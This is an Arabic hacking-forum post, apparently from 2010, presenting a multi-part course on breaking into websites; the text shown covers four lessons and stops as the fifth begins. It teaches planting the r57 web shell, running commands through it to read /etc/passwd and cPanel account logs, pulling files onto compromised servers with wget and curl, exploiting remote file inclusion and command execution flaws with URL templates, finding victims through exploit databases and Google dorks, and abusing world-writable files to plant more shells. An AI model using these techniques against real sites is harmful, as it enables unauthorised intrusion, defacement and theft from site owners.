نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

 
العودة   منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team | > ::. ســــاحة الــــهاكــــر الـعـام .:: > [ الدورات العامة ]
 

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 17/08/2010, 22:01   المشاركة رقم: 1
المعلومات
الكاتب:
 DR.X  
اللقب:
(( الزعيم ))
الصورة الرمزية
 
الصورة الرمزية DR.X

البيانات
التسجيل : Aug 2010
العضوية : 467
الاهتمامات : MASTER HACKER
الإقامة : IRAQ
المواضيع : 158
الردود : 359
المجموع : 517
بمعدل : 0.09 يوميا
الاختراقات : [DR.X]
مجتمعنا : []
الصنف : Black Hat Hacker
آخر تواجد : 02/02/2013/00:54
سبب الغياب : حاظر
معدل التقييم: 16
نقاط التقييم: 10
DR.X is on a distinguished road
شكراً: 0
تم شكره 18 مرة في 12 مشاركة

 Iraq


الإتصالات
الحالة:
DR.X غير متواجد حالياً
وسائل الإتصال:

Talking دورة كاملة عن اختراق المنتديات وتتكون من سبع دروس اهداء الى الكادر ارجو التثبيت

الدرس الاول



مفاهيم أختراق المواقع ومعلومات عن شيل r57


بسم الله الرحمن الرحيم



السلام عليكم ورحمة الله وبركاته



حياكم الله اخواني .. نقدم لكم اول درس في هذا القسم
قبل مانبدأ في الدرس احب اخبركم ان الدروس راح تكون بالتسلسل ان شاء الله حتى تصل
الى المستوى المتمكن وان يكون لديك مجموعة من المعلومات التي تمكنك من الأختراق بأذن الله والشرح مقدم على جيوش الهكرز



درسنا عن:



:: مفاهيم أختراق المواقع وبعض المعلومات عن الشل r57 ::



من المعروف لأختراق اي شيىء لابد لابد من وجود ثغـرة تمكنك من أختراقة
معناته ان اهم شي قبل الأختراق هو وجود ثغرة .. ونقصد بالثغرة اي الثغرات الخطيره التي تمكنك من رفع شل على الموقع



اختراق المواقع بسيط جداً لأنه يتطلب منك شيئين:
1- ان يكون لديك معرفة بأستخدام الشل.
2- ان تكون ملم بأستخدام الأوامر سواء كانت اوامر الدوس او اوامر الينكس وهذا الأهم.



البعض يسأل عن الشل ويسمع عنه كثير ولا يعرفه ؟
الشل بأختصار هو سكربت تجسس تستطيع بواسطتة تنفيذ أوامر لجمع أكبر قدر من المعلومات تمكنك من أختراق الموقع
طبعاً الشل انواع كثيرة ليس نوعاً واحد لاكن جميعها الهدف منها تنفيذ الأوامر .. اي مهما اختلف عليك شكل الشل
أعرف ان الهدف واحد وهو تنفيذ الأوامر.



طيب البعض يسأل ماهي أوامر الدوس ؟
الدوس هو موجة الأوامر في نضام الوندوز الي بواسطتة تستطيع فعل كل شيء فقط المطلوب معرفة الأوامر الخاصة به وكيف تستخدم
و اوامر الدوس لا تهمنا كثيراً ولا يتطلب منك معرفتها "الأن" لاكن كتبتها للفائدة فقط.



مايهمنا هو (( اوامر الينكس )) ومادمت هاوي اختراق المواقع لابد ان تتعرف على هذه الأوامر وان شاء الله سيخصص درس مفصل عنها
ذكرنا انه لابد من معرفة اوامر الينكس البعض يسأل .. ماهو الينكس؟
هو نضام تشغيل مثل الوندوز الذي تستخدمة ويهمنا معرفة اوامره لكي نستخدمها عندما نتمكن من رفع شل على احد المواقع
مازلنا نذكر الشل حتى هنا ولم نكتفي بالتعريف السابق .. لا تقلق لن تخرج من هذا الدرس الا وقد تعرفت عليه ان شاء الله



يدور برأسي سؤال وهو لماذا ذكرنا الأنضمة هنا مع ان الدرس لأختراق المواقع وليس لأختراق الوندوز او الينكس ؟
لأن من المعروف ان المواقع تكون على سيرفر وهذا السيرفر لايعمل الى بنضام تشغيل اي ان السيرفر في الأصل جهاز لاكن بقدرات اقوا جداً من الجهاز المكتبي



الذي تستخدمة الأن
وعند رفع الشل الى احد المواقع على هذا السيرفر فأنك توجه الأوامر للسيرفر بأن يفعل .... على الموقع الـ ....



طبعاً تكون مقيد بشروط وصلاحيات ولن ينفذ اي امر توجه اليه لأنك مقيد بأوامر معينة لا تستطيع ان تخرج عنها ولن يتعرف على غيرها.
نضرب مثال : لو اردت ان تأمر اخوك الصغير وتقول له جب لي عصير من الثلاجة وهو لا يعرف سوا اللغة العربية هل سيفهم لو قلت له هذا الأمر باللغة الأنجليزية .. اكيد لا ..



وان قلت له باللغة العربية راح يفهم وينطلق الى الثلاجة ان وجد العصير اتى به وان لم يجده بيرجع لك يديه فاضية :d
اذاً تنفيذ الأوامر بالشل شبيه بالمثال ولنفترض ان السيرفر هو اخوك الصغير .. والعصير هو ملف ما .. والثلاجة هي الموقع الذي نريده .. وانت موجه الأوامر
بهذي الحالة يكون الأمر : طلب من السيرفر بأحضار "قراءة" الملف الموجود في الموقع المراد.
إن وجد الملف عرضه لك وأن لم يجده ماراح يعرض لك شي طبعاً
المثال اعلاه للتبسيط وإصال المعلومة فقط !




ننتقل الأن الى الشل والتعرف عليه بشكل أوسع



شاهد صورة للشل .. واسم هذا الشل هو r57




سوف نقوم بشرح "الأشياء المهمة" في هذا الشل بالتفصيل ان شاء الله



الجدول الأول



[]




كما تشاهدون الموضح باللون الأصفر
safe mode : حالة الوضع الأمن (الحماية) وسيكون أمامها اما OFF أو ON
في حالة الـOFF تستطيع التحكم في المواقع بدون معوقات اما في حالة الـON فستحدث بعض التغييرات في الشل



وستكون مقيد ببعض الأشياء وسيتم تخصيص درس لذالك للتوضيح أكثر ان شاء الله .
Disable functions : هنا الدوال المعطلة في السيرفر وسنتعرف عليها أكثر في الدروس القادمة



الجدول الثاني



[]



الموضح باللون الأصفر هو عنوان السيرفر
2- نوع نضام السيرفر وهو Linux
3- صلاحياتك على السيرفر .. سوف يخصص لها درس مفصل
4- مكان تواجدك على السيرفر والموضح باللون الأصفر هو يوزر الموقع الذي نحن بداخلة



اي ان الأن اصبح لديك معلومة سريعة وهي معرفة يوزر الموقع وهذا اليوزر هو نفسه اليوزر الذي تستخدمة في الـ



FTP للدخول الى الموقع لاكن ينقصك باسورد الموقع وسوف نوضح كيفية الحصول عليه في الدروس القادمة .. توضيح مفصل لرقم 4 لأهميته:
/ home /؟؟؟؟/ public_html /
/ home / = هو المجلد الي يكون بداخلة اليوزرات "المواقع" ولا تستطيع استعراض مابداخله لأن عليه تصريح يمنع ذالك
؟؟؟؟/ = يوزر صاحب الموقع ولا يشترط ان يكون اليوزر هو نفس عنوان الموقع ممكن يكون اليوزر asdely ويكون



عنوان الموقع [] يعني ماله اي علاقة بالعنوان وفي الغالب يكون نفس عنوان الموقع او مشابة له
public_html / = المجلد الرئيسي للموقع وهنا توضع ملفات ومجلدات الموقع
معناته اي شي يوضع في هذا الملف الرئيسي رايح يكون اسمه بعد عنوان الموقع مباشرة
نضرب مثال: لو ان هذا اسم الموقع []
ويوجد صورة بداخل مجلد / public_html / في الموقع المذكور بأسم asdely.jpg
لنستعرض هذه الصوره في المتصفح يكون العنوان بهذا الشكل
[]
للتسهيل اعتبر ان / public_html / هو عنوان الموقع ودائماً اي شي يلي هذا المجلد
سيكون بعد عنوان الموقع مباشره


هنا سيكون نتيجة الأوامر



موجة الأوامر



[]



Run command : هنا تكتب الأمر الذي تريد تنفيذة
Work directory : هنا مسار تواجدك ومثل الموضح في الصورة مسارنا:
/ home / sixfinge / public_html / thecoolbeenz / TikiWiki /new
اي عند تطبيق اي أوامر داخلية (انشاء ملف - حذف ملف ....) سوف يطبقها في مجلد new
طيب لو أردنا حذف ملف بأسم a.php في مجلد TikiWiki
نكتب في الفراغ الأول أمر حذف الملف
وفي الفراغ الثاني نضع مسار المجلد المطلوب تنفيذ الأمر بداخلة وسيكون:
/ home / sixfinge / public_html / thecoolbeenz / TikiWiki /
ثم تقوم بالضغط على زر Execute في الشل او بالضغط على زر انتر من الكيبورد
وهكذا ...



محرر الملفات



[]



يقوم بتحرير الملفات الي مصرح لك بالتعديل عليها ((فقط)) ونعرف بأنه مصرح لنا بالتعديل عليها يكون تصريحها 777



ورمز هذا التصريح (-rwxrwxrwx) وسنوضح ذالك بالتفصيل في الدروس القادمة ان شاء الله




الى هنا انتهى الدرس الأول
واتمنى اني استطعت ان اوصل لكم بعض المعلومات المفيدة
واي استفسار عن محتوى الدرس يطرح لو كان استفسار عن كلمة واحدة
(( لا تــــنسونا مــن صـــــــالــح دعـــــائــكـــم ))
تحياتي

الدرس الثاني


اووامر اللينكس

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته


درسنا الثاني عن:

|| اوامر الينكس ||

وضحت في الدرس السابق عن نضام الينكس وقلت انه نضام تشغيل وله اوامر ولم اتطرق او اكتب اي امر
وتركت لهذي الأوامر درس خاص بها لتصل المعلومات بأبسط صورة ممكنة .. ابدأ بعض الأسئلة المهمة تمهيداً للدرس

مافائدة اوامر الينكس؟
فائدتها بأختصار لا تستطيع الأختراق أو التحكم بدونها .. معناته ان مجال اختراق المواقع يعتمد على هذي الأوامر في كل صغيرة وكبيرة

بعد معرفة الأوامر اين تكتب ومن اخاطب بهذه الأوامر؟
تكتب الأوامر في الشل بعد زرعه او رفعه في الموقع المستهدف
وتخاطب بهذه الأوامر السيرفر الذي عليه هذا الموقع وتطلب منه فعل ماتريد في "حدود معينة"

سنقوم الأن بالتعرف على بعض اوامر الينكس الي راح تفيدنا في الأختراق ان شاء الله

الأمر: id
وظيفته: عرض صلاحياتك على السيرفر
شكل الأمر في ساحة العرض

[]

الأمر: pwd
وظيفته: اظهار مكانك على السيرفر (المسار الي انت عليه)
مثال: إذا كنت داخل على يوزر بأسم asdely في مجلد المنتدى لنفترض انه بأسم vb
بعد تطبيق امر pwd راح يعرض لنا هذا المسار
/ home / asdely / public_html / vb
شكل الأمر في ساحة العرض

[]

الأمر: ls -la
وظيفته: عرض جميع الملفات والمجلدات مع تصاريحها
طبعاً يعرض لك على حسب المجلد الذي انت بداخله عند تنفيذ هذا الامر


الأمر: cat
وظيفته: قراءة الملفات
مثال: إذا أردت قراءة كود ملف بأسم aljyyosh.php يكون الأمر بهذا الشكل cat aljyyosh.php

الأمر: mkdir
وظيفته: إنشاء مجلد جديد
مثال: إذا أردت إنشاء مجلد بأسم asdely يكون الأمر بهذا الشكل mkdir asdely

الأمر: chmod xxx
وظيفته: تغيير تصريح مجلد او ملف
مثال: إذا اردت تغيير تصريح مجلد بأسم net يكون الأمر بهذا الشكل chmod xxx net
مع تغيير xxx الى رقم التصريح المطلوب

الأمر: touch
وظيفته: إنشاء ملف
مثال: إذا أردت إنشاء ملف بأسم asdely.php يكون الأمر بهذا الشكل touch asdely.php
طبعاً الملف راح يكون فارغ وخالي من الأكواد ممكن انت تكتب فيه شي عن طريق "تحرير الملفات" في الشل

الأمر: mv
وظيفته: نقل الملفات أو تغيير تسميتها
مثال: إذا أردت نقل ملف بأسم aljyyosh.php الى مكان أخر يكون الأمر بهذا الشكل
mv aljyyosh.php / home / ??? / public_html / asdely
وتستبدل / home / ??? / public_html / asdely الى مسار المجلد الي بتنقل الملف اليه
ويشترط ان يكون هذا المجلد يحمل تصريح 777 (drwxrwxrwx)
مثال لتغيير تسمية الملف: إذا أردت تغير تسمية ملف بأسم a.php الى b.php
يكون الأمر بهذا الشكل mv a.php b.php

الأمر: cp
وظيفته: نسخ الملفات
مثال: إذا أردت نسخ ملف بأسم aljyyosh.php الى مكان أخر يكون الأمر بهذا الشكل
cp aljyyosh.php / home / ??? / public_html / up
وتستبدل / home / ??? / public_html / up الى مسار المجلد الي بتنسخ الملف اليه
ويشترط ان يكون هذا المجلد يحمل تصريح 777 (drwxrwxrwx)

الأمر: rm
وظيفته: حذف ملف
مثال: إذا أردت حذف ملف بأسم aaa.php يكون الأمر بهذا الشكل rm aaa.php

الأمر: rm -r
وظيفته: حذف مجلد
مثال: إذا أردت حذف مجلد بأسم aaa يكون الأمر بهذا الشكل rm -r aaa

الأمر: *
وظيفته: يضاف الى الأوامر المذكورة سابقاً وهي ترمز الى "الكل"
مثال: إذا كنت بداخل مجلد يحتوي على ملفات كثيرة وانت تريد تغيير صلاحيات جميع هذه الملفات
إلى تصريح معين من المتعب أن تقوم بتغييرها ملف ملف .. فهذا الأمر يختصر المسألة
بحيث تقوم مثلاً بتطبيق هذا الأمر chmod 777 * في هذي الحالة بتلاحظ ان جميع محتويات المجلد وحدت تصاريحها الى التصريح المطلوب

الأمر: find
وظيفته: البحث عن ماتريده
مثال: إذا أردت أن تبحث عن ملف بأسم a.php سيكون الأمر بهذا الشكل find a.php
شكل الأمر في ساحة العرض

[]

مثال أخر: إذا أردت أن تبحث عن أمتداد معين مثل .php يكون الأمر بهذا الشكل find *.php


مثال أخر: إذا أردت أن تبحث عن أسم معين مثل b سواء كان نوعة ملف او مجلد يكون الأمر بهذا الشكل find b*
شكل الأمر في ساحة العرض

[]

الأمر: ;
وظيفته: الربط بين الأوامر وتنفيذها جميعها في وقت واحد
مثال: لو اردت انشاء ملف ثم عرض محتويات المجلد للتأكد بأنه قام بأنشاء الملف
يكون الأمر بهذا الشكل touch file.php;ls -la كما تشاهد في الأصل الأمر يتكون من امرين
هما touch و ls -la طبعاً تقدر تربط اكثر من امرين وانصح بالأكثار من أستخدامه لأنه بيساعدك كثير


أوامر رفع الملفات
لرفع اي ملف تريد ويفضل ان يكون مضغوط .. طبعاً يكون الملف على رابط وليس من جهازك ويوجد أكثر من امر لرفع الملفات

وراح اطرح أكثر من أمر لكي لا يصعب عليك رفع ملف في أي حال
لأن بعض أوامر الرفع لا تستجيب على بعض السيرفرات
قبل ماتنفذ أمر الرفع تقوم بتطبيق "أمر التأكد" هل يمكنك رفع ملف بواسطة هذا الأمر او لا
أمر الرفع: wget
طريقة عمل الأمر: wget []

أمر الرفع: curl
طريقة عمل الأمر: curl -o aljyyosh.zip []

أمر الرفع: GET
طريقة عمل الأمر: GET [] > aljyyosh.zip
أمر الرفع: lynx
طريقة عمل الأمر: lynx -source [] > aljyyosh.zip
أمر التأكد من عمل اوامر الرفع: which xxxx واتسبدل xxxx بأمر الرفع
اذا كان الناتج بهذا الشكل / usr / bin /xxxx معناتة يمكنك أستخدام هذا الأمر في الرفع
xxxx تتغير إلى أمر الرفع الي طبقتة

الأمر: unzip
وظيفته: فك ضغط الملفات والمجلدات المضغوطة بواسطة برنامج الضغط winzip
مثال: إذا أردات أن تقوم بفك ضغط ملف بأسم asdely.zip يكون الأمر بهذا الشكل unzip asdely.zip

نكتفي بطرح هذي الأوامر
للمعلومية جميع الأوامر السابقة تستطيع تسميتها بالأوامر الداخلية لأنها تنفذ في نفس المسار الي انت بداخله

وسأطرح بعض الأوامر الخارجية
واغلب الأوامر الخارجية تكون لأهداف معينة تفيدنا بجمع المعلومات
ملاحظة: جميع الأوامر التي بأسفل عند تنفيذها قم بحذف النقاط لأن النقاط كتبت بسبب حماية المنتدى تمنع كتابة مثل هذي الأوامر

الأمر: cat /.etc./.passwd
وظيفته: إظهار جميع يوزرات المواقع

الأمر: ls /.var./.named
وظيفته: إظهار المواقع

الأمر: ls -la /.etc./.valiases
وظيفته: إظهار المواقع+يوزراتها

الأمر: cat /.var./.cpanel./.accounting.log
وظيفته: إظهار جميع المواقع+يوزراتها

الأمر: find / -type f -name "asdely*"
وظيفته: أمر بحث شامل في جميع انحاء السيرفر فقط استبدل asdely بالأسم الي تبحث عنه


نكتفي بهذي المجموعة من الأوامر ويوجد المزيد يمكنك اكتشافة اذا استمريت في تطبيق الأوامر والبحث عنها

انتهى الدرس

الشرح إهداء لكل من إتبع الهدى ويأمن بالله وبرسوله

تحياتي

الدرس الثالث

البحث عن الثغرات ورفع الشل


بسم الله الرحمن الرحيم



السلام عليكم ورحمة الله وبركاته



تحدثنا في الدروس السابقة عن مفاهيم أختراق المواقع وعن أوامر الينكس



وسيكون درسنا الثالث:



البحث عن الثغرات الجديده ورفع الشل (الأختراق العشوائي)



بداية درسنا هذا ندخل في الجد لتطبيق ماتعلمناه في الدرسين السابقه وبالأخص تطبيق الأوامر
لتطبيق الأوامر الي تعلمتها تحتاج شل .. والشل لابد تزرعة على موقع عن طريق ثغرات الريموت وهي
Remote File Include
commands execution
وهذي النوعية من الثغرات خــطــيرة جداً
والسبب انها تنفذ اوامر على السيرفر وممكن تسيطر على الموقع بشكل كامل
طبعاً يوجد ثغرات اخرى للمواقع لاكن ليست بمستوى هالنوعيه وباقي الثغرات اقل خطوره



نوضح طريقه عمل نوعية الثغرتين مع تطبيق عملي تجربة بنفسك



((Remote File Include))
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال على شكل استثمار الثغرة
[]?
-| نفصل الرابط |-
موقع الضحية: []
الملف المصاب بالثغرة: index.php?asdely=
ملف الشل: []
وبعد التنفيذ اذا الثغرة موجوده والموقع مصاب بها راح تشوف عرض لك الشل .. وهنا يجي وقت تنفيذ الأوامر
ومثل ماتشوف ان رابط الشل جا بعد علامة " = "
ايضاً لابد ان يكون الشل بأمتداد .txt يعني ملف نصي وبعد رابط الشل تضع علامة استفهام " ? "

اما النوعية الثانية
((Remote commands execution))
طريقة عمل هذه النوعية من الثغرات هي تنفيذ الأوامر على طول بدون ماتحط رابط الشل
مثال على شكل استثمار الثغرة
www.google.com/index.php?cmd=ls -la
-| نفصل الرابط |-
موقع الضحية: []
الملف المصاب بالثغرة: index.php?cmd=
احد اوامر الينكس: ls -la
وبعد التنفيذ اذا الثغرة موجودة فعلاً راح تشوفه يعرض لك في المتصفح نتيجه الأمر المنفذ
ولو نفذت مثلاً امر ls -la راح يعرض لك الملفات والمجلدات والتصاريح في المتصفح وبشكل غير مرتب يصعب التفرقه بين الملفات والمجلدات
ولعرضها بشكل مرتب مثلاً في متصفح الأكسبلور .. من الأعلى تضغط على "عرض" ثم تختار من القائمة "المصدر" وراح يعرض لك نتيجه الأمر في ملف نصي وبيكون بشكل مرتب
[ثغرة للتطبيق]
تم إزالة التطبيق بسبب أحد الأطفال
طبعاً مكان id مثل ماقلنا نكتب الأوامر
يوجد شرح سريع بالفديو في المرفقات بأسم (r-c-e)




بعد ماعرفنا طريقه عمل ثغرات الريموت
ننتقل الى كيفية ايجاد الثغرات الجديدة بأستخدام موقع milw0rm
رابط الموقع
http://www.milw0rm.com/
من هذا الموقع راح نتابع احدث ثغرات المواقع
بعد الدخول الى الموقع شاهد الصوره لمعرفة كيفية إيجاد ثغرات المواقع





مثال على ثغرة فايل انكلود "Remote File Include" من موقع milw0rm
Exhibit Engine <= 1.22 (styles.php) Remote File Include Vulnerability
-| تفصيل العنوان |-
اسم السكربت: Exhibit Engin
اصدار السكربت: 1.22
الملف المصاب بالثغرة: styles.php
نوع الثغرة: Remote File Include



طبعاً لمشاهدة الأستثمار للثغرة تضغط على عنوانها وراح تفتح لك صفحة ثانية فيها كود الثغرة وأسم المكتشف ...الخ والي يهمنا هو "استثمار الثغرة"
ويوجد بداخل الصفحة مصطلحات بسيطة وتختلف من ثغرة الى اخرى
وسنقوم بتوضيحها بالتفصيل ان شاء الله



المصطلحات التي تدل على استثمار الثغرة
Example:
Expl:
Exploit:
Exploits:
وجميع هذي المصطلحات تعني الأستثمار وتجد اسفلها او بجانبها شكل الأستثمار للثغرة
مثال على احد المصطلحات:
http://www.milw0rm.com/exploits/2850
يوجد بالأسفل
Expl:
http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]
اذاً على طول نفهم ان الأستثمار للثغرة هو:
http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]
وطبعاً الأستثمار لابد نعدل عليه بعض الأشياء مثل اسم الموقع نغيره الى الموقع الي لقينا فيه الثغرة وايضاً اسم مجلد السكربت ورابط الشل



ويوجد مصطلحات للأستثمار نفسه ولابد نعرفها عشان نعرف كيف نعدل الأستثمار وراح أقسمها الى مجموعات:



المجموعة الأولى
http://www.site.com/
[target]
[site]
[namesite]
[url]
- جميعها تدل على عنوان موقع الضحية -
مثال على أحد مصطلحات عنوان الموقع:
Example: http://[site]/modules/NukeAI/util.php?AIbasedir=[php shell]
المصطلح المكتوب في الأستثمار هو [site] ومثل ماذكرنا انها تدل على عنوان موقع الضحيه
نفرض ان الموقع المستهدف هو [] راح يكون التعديل على الأستثمار بهذا الشكل
[][php shell]



المجموعة الثانية
/[scripts]/
/[path]/
/[dir]/
/[folder]/
طبعاً ممكن تحدث بعض التغيرات مثلاً يكون شكل المصطلح /[path_asdely]/ مب شرط يكون مطابق لما ذكر
- جميعها تدل على اسم مجلد السكربت المصاب بالثغرة -
مثال على أحد مصطلحات أسم مجلد السكربت المصاب:
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
المصطلح كما هو في الأستثمار [path] وهذا المصطلح من ضمن مصطلحات اسم مجلد السكربت المصاب بالثغرة
نفترض ان اسم مجلد السكربت المصاب هو asdely وعنوان الموقع المستهدف هو []
يكون شكل الأستثمار بعد التعديل:
[][templatesDirectory]=evill
ومن المعروف ان الأسم الذي يكون بين علامتين السلاش "/ /" في الرابط معناته مجلد



المجموعة الثالثة
[SHELLURL]
[evil]
[shell]
[yourevil]
[evil_scripts]
[cmd]
[php shell]
- جميعها تدل على رابط الشل -
دائماً تجد هذه المصطلحات في أخر الأستثمار
مثال على أحد مصطلحات رابط الشل:
http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]
نفترض أن عنوان الموقع المستهدف هو [] واسم مجلد السكربت المصاب alkaser وعنوان الشل []?
يكون شكل الأستثمار بعد التعديل:
[]?
الأن الأستثمار عدل عليه بشكل كامل وهو جاهز للأستعراض
طبعاً الشل مثل ماذكرنا يكون بأمتداد txt وانت تقوم برفعه على اي مساحة او مركز تحميل يسمح بالأمتداد txt ثم تستخدمة في الأستثمارات بشكل دائم



المطلوب فعله مع جميع استثمارات ثغرات فايل انكلود:
1- عنوان الموقع المستهدف
2- اسم مجلد السكربت المصاب
3- رابط الشل بأمتداد txt
بعد توفر هذي الثلاث اشياء تقوم بالتعديل على الأستثمار ثم تستعرضه في المتصفح
ان عرض لك الشل معناته السكربت مصاب والمطلوب منك تنفيذ الأوامر
وان لم يعرض لك الشل معناته السكربت تم ترقيعه من الثغره وهو غير مصاب
ايضاً ممكن يعرض لك الشل اليوم تجي بكره تبي تسوي شي او تنفذ كم امر تستعرض الرابط وتلقاه ماعرض لك الشل
مع انه في الأمس كان شغال الشل .. على طول تعرف ان السكربت تم ترقيع الثغره الي فيه



طبعاً جميع كلامنا السابق المقصود به هو ثغرات Remote File Include لأن مثل ماذكرت بأول الموضوع انها منتشره وبشكل كبير
أما Remote commands execution قليله ثغراتها



وطريقة البحث عن السكربت المصاب تكون بنسخ اسم السكربت ثم البحث عنه في قوقل او اي محرك بحث أخر
نفترض اننا نبي نبحث عن هذي الثغرة
Messagerie Locale (centre.php) Remote File Inclusion Vulnerability
نقوم بنسخ اسم السكربت وهو Messagerie ولصقه في محرك البحث قوقل ثم تقوم بتجهيز الأستثمار والتجربة في النتايج الي طلعها لك محرك البحث
ايضاً يوجد بعض الثغرات موفر لنا طريقة البحث عن الثغرة
وفي الغالب تكون امام هذا المصطلح (( Dork : ))
مثال على المصطلح:
http://www.milw0rm.com/exploits/2832
وهذا المصطلح وكلمة البحث تبع السكربت المصاب
Dork : inurl:indexmess.php
كل الي عليك تنسخ inurl:indexmess.php وتلصقه في محرك البحث قوقل ثم تقوم بالبحث
وللمعلومية هذي الثغرة هي نفسها
Messagerie Locale (centre.php) Remote File Inclusion Vulnerability
بأمكانك البحث عن اسم السكربت: Messagerie او اسم البحث الجاهز: inurl:indexmess.php

تحياتي للجميع


الدرس الرابع

التصاريح

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته


درسنا الرابع عن

|| التصاريح او التراخيص ||

ومن هذا الدرس نبدأ بدروس مابعد رفع الشل

كثير مننا يسمع هذي الكلمتين "تصاريح - تراخيص" ويعتقد انها تختلف وفي الأصل معناها واحد
وهي تتعلق بخصائص الملف او المجلد ويطلق عليها بالأنجليزي Permissions .

ماهي التصاريح "Permissions"؟
هي احد خصائص الملفات و المجلدات التي يضعها مالك الموقع او السيرفر على ملفاته لحمايتها.

كيف تعمل هذه التصاريح؟
يضع المالك التصاريح على ملفاته بحيث عند وصول اي مستخدم اخر لهذه الملفات لا يستطيع الأستفاده منها بشكل كامل
في الغالب التصاريح تكون على النحو التالي:
1- تصاريح تمكنك من قراءة محتوى الملف فقط دون أي تعديل.
2- تصريح يمكنك فعل ماتريد على الملف من [تعديل - تغيير التسميه - نسخ - نقل - حذف - تشغيل].
3- تصاريح تمنعك من فعل كل ماذكر في رقم 1 و 2 وفي الغالب هذي التصاريح تكون على الملفات المهمه جداً.

ماهو شكل التصريح؟
هو رقم من ثلاث خانات ويوجد لكل تصريح رمز معين لا يتغير
مثال:
هذا احد التصاريح: 777

ماهي الفائدة من معرفة تصريح الملف؟
عند معرفة التصاريح تستطيع تحديد ماتريد فعله في الموقع لأن التصاريح تقوم بدور كبير في حماية الموقع
ويجب عليك معرفة التصريح الذي يمكنك من فعل الكثير وهو التصريح (777)
لأن هذا التصريح هو المقصود في رقم 2 وعند وجود هذا التصريح على ملف او مجلد يمكنك من التعديل و النسخ و...الخ.

كيف استفيد من التصريح 777 عند وجوده على (مجلد)؟
تستطيع رفع ملفات مثل رفع شل اخر بداخل هذا المجلد وتستطيع تعديل كل الملفات التي بداخل هذا المجلد
ايضاً تستطيع نسخ اي ملف أخر ووضعه بداخل هذا المجلد ... والكثير

كيف استفيد من التصريح 777 عند وجوده على (ملف)؟
تستطيع تبديل محتوى الملف مثلاً بكود اي شل ...

متى نتجاهل التصاريح ؟
اذا كانت ((( صلاحياتنا ))) على السيرفر يوزر .. وسوف يخصص درس كامل عن الصلاحيات إن شاء الله

امر تغيير التصاريح كما ذكرناه في الدروس السابقه هو:
chmod 777 file.php
تفصيل الأمر
chmod= ثابته وهي لتغيير التصريح
777= تتغير على حسب حاجتك وطبعاً تستبدلها بالتصريح الذي تريد
file.php= تستبدلها بأسم الملف أو المجلد المراد تغيير تصريحه

-|خلاصة الدرس|-
هو التركيز على التصريح 777 عند اختراق اي موقع لأنه راح يفيدك كثير ان شاء الله


للمزيد من المعلومات راح اتعمق أكثر في التصاريح ((ليس مهم جداً أن تفهم التفاصيل الي بتذكر الأن)) لاكن للفائدة فقط وزيادة المعلومات

نفترض انك شفت هذا التصريح ( 777 ) على ملف وذكرنا انه يرمز إلى -rwxrwxrwx وانت تبي تعرف شلون جا الرمز بهذا الشكل
-[ نفصل الرمز ]-
- << كما ذكرنا في الدروس السابقه ان الملفات تبدا بـ شرطه والمجلدات تبدا بحرف d
راح اوضح كيف عرفت ان الرمز rwx rwx rwx يعني 777
في الأصل الحروف r w x تعني:
r = 4
w = 2
x = 1
ولو جمعنا 4+2+1= 7 ولأن rwx مكرره ثلاث مرات اصبح 777
طيب لو شفنا هذا التصريح rwxr-xr-x على ملف وش بيكون الرقم ؟
نفصله [ rwx r-x r-x ]
ايضاً اذا وجد في الرمز علامة (-) يساوي 0 يعني صفر ماينحسب
نشوف وش بيكون شكل الرقم
rwx = 4+2+1=7
r-x = 4+0+1=5
r-x = 4+0+1=5
مثل ماتشوفون رقم التصريح طلع 755 وبهذي الطريقة تعرف الأرقام

طيب البعض يقول ليش يتكرر الرقم ثلاث مرات وليش انا اقسم الرمز الى ثلاث اقسام مثل (rwx rwx rwx)
rwx rwx rwx
3 2 1
1= تصريح مالك الملف
2= تصريح مجموعة مالك الملف
3= تصريح المستخدمين الأخرين
اي ان التصريح مقسم الى ثلاث اقسام وكل قسم يخص مستخدم أو مجموعة مستخدمين

طيب مامعنى الحروف r و w و x ؟
r= قراءة
w= كتابة
x= تنفيذ
اي عندما نشاهد rwxrwxrwx تعني الجميع لهم التحكم الكامل من قراءة و كتابة و تنفيذ
وعندما نشاهد rwxr-xr-x
تعني ان مالك الملف له التحكم الكامل " rwx"
ومجموعة المالك تستطيع القراءة والتنفيذ فقط "r-x"
والأخرين يستطيعون القراءة والتنفيذ فقط "r-x"

تحياتي


الدرس الخامس

الصلاحيات
بسم الله الرحمن الرحيم


السلام عليكم ورحمة الله وبركاته


حياكم الله اخواني كل عام وانتم بخير .. والله يتقبل منا ومنكم صالح الأعمال
اتمنى اني افدتكم في الدروس السابقه واليوم نعود لكم بدرس جديد وهو الدرس الخامس


درسنا الخامس عن:


|| الـصـلاحـيـات ||


